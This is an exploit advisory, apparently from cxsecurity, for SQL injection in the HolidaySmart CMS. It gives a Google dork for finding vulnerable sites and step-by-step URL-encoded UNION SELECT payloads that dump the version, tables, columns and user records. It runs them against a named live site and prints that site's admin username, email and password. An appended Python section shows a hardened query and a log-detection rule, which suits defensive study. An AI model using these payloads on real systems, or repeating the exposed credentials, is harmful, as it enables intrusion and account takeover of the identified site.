Powered By WorldTravelGuide HolidaySmart CMS SQL Injection Vulnerability

2018.07.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : Powered By WorldTravelGuide HolidaySmart CMS SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/07/2018
# Vendor Homepages : worldtravelguide.net ~ holidaysmart.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : inurl:''/cms.php?id='' site:af
# Exploit : /cms.php?id=[SQL Inj]
# Manually SQL Injection Exploit Checked [ Example Site => airgateway.af ]

Here is the SQL Inj Attack Scenario =>

127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-

Information appears on the page => 5.6.39-83.1

127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20-

Information appears on the page => categories,client_contact,gallery,links,misc,news,news_letter,order_products,order_reply,orders,pages,product_to_categories,products,products_images,slideshow,users

127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20-

Information appears on the page => user_id,user_name,user_email,user_pswd,user_fname,user_address,user_phone,user_dob,user_m_status,user_kids,user_pic,user_pic_status,user_city,user_country,user_create,user_last_login,user_status,user_ac_status,total_login,user_login_status

127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20-

Information appears on the page [ Admin username - Admin E-Mail Address - Admin Password ] => roheenkhan:roheen@airgateway.af:j414H8J3wFc

#################################################################################################
# Example Site => airgateway.af/cms.php?id=-6
# [ Proof of Concepts for SQL Inj ] =>

airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-
Proof => archive.is/Pr4uO

airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20-
Proof => archive.is/FLokd

airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20-
Proof => archive.is/8wHLE

airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20-
Proof => archive.is/Shksx

# SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
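The advisory shows the symptom (a quoted `id` parameter spliced straight into a MySQL query) but not the CMS source. The block below is an added example, not code from the advisory or from the HolidaySmart CMS: it reconstructs the CWE-89 pattern in a hypothetical `page_lookup_vulnerable` function, puts the fixed version (`page_lookup_hardened`, integer validation plus a bound parameter) beside it, and adds a `flag_request` check a defender could run over access-log request lines to spot `cms.php?id=` values that are not plain integers. The schema and rows are constructed in an in-memory SQLite database for this example; only the table and column names (`pages`, `users`, `user_name`, `user_pswd`) are taken from the advisory, and the MySQL-specific versioned comments from the page are replaced by a plain `UNION` because SQLite has no equivalent.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

INTEGER_ID = re.compile(r"[0-9]+")


def build_db() -> sqlite3.Connection:
    # Constructed sample schema; the row contents are invented for this example.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT,
                            user_email TEXT, user_pswd TEXT);
        INSERT INTO pages VALUES (6, 'About', 'About this travel site');
        INSERT INTO users VALUES (1, 'admin', 'admin@example.invalid', 'hash-placeholder');
        """
    )
    return conn


def page_lookup_vulnerable(conn: sqlite3.Connection, page_id: str) -> list:
    # Hypothetical reconstruction of the flawed pattern: the raw request value
    # is interpolated into the SQL text inside quotes, so a single quote in
    # the input ends the literal and the rest is parsed as SQL (CWE-89).
    sql = f"SELECT id, title, body FROM pages WHERE id = '{page_id}'"
    return conn.execute(sql).fetchall()


def page_lookup_hardened(conn: sqlite3.Connection, page_id: str) -> list:
    # Two independent layers: reject anything that is not a plain integer
    # before it reaches the database, then bind the value as a parameter so
    # the driver sends it as data rather than as part of the statement text.
    if not INTEGER_ID.fullmatch(page_id):
        raise ValueError("page id must be a non-negative integer")
    sql = "SELECT id, title, body FROM pages WHERE id = ?"
    return conn.execute(sql, (int(page_id),)).fetchall()


def flag_request(request_path: str) -> bool:
    # Detection rule for access logs or a WAF: any cms.php?id= value that is
    # not a plain integer after URL decoding is suspicious. parse_qs already
    # decodes %27 and turns '+' into a space, so the advisory's encoded
    # payloads are judged on their decoded form.
    query = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    return any(not INTEGER_ID.fullmatch(value) for value in query.get("id", []))


if __name__ == "__main__":
    db = build_db()
    # Constructed injected value in the same shape as the advisory's payloads,
    # written for SQLite: close the quote, UNION in rows from another table,
    # comment out the trailing quote.
    injected = "-6' UNION SELECT user_id, user_name, user_pswd FROM users -- "
    print("vulnerable, benign id :", page_lookup_vulnerable(db, "6"))
    print("vulnerable, injected  :", page_lookup_vulnerable(db, injected))
    print("hardened, benign id   :", page_lookup_hardened(db, "6"))
    try:
        page_lookup_hardened(db, injected)
    except ValueError as exc:
        print("hardened, injected    : rejected ->", exc)
    print("log check, encoded payload:",
          flag_request("/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20-"))
```

The vulnerable function returns the `users` row for the injected value because the quote in the input terminates the literal, which is exactly how the advisory's `-6%27+...` requests leak `user_name:user_email:user_pswd`. The hardened function never builds SQL from the input, and `flag_request` gives a cheap way to search existing logs for the same request shape even before the code is patched.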


Copyright 2018, cxsecurity.com